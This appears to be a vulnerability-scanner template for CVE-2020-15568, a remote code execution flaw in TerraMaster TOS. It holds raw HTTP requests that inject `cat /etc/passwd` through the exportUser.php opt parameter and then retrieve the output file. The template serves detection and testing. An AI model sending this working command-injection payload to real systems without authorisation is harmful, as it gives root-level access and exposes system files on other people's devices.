id: CVE-2020-15568 info: name: TerraMaster TOS <.1.29 - Remote Code Execution author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. reference: - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-15568 - https://help.terra-master.com/TOS/view/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 epss-score: 0.96537 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master product: tos tags: cve,cve2020,terramaster,rce variables: filename: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - | GET /include/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200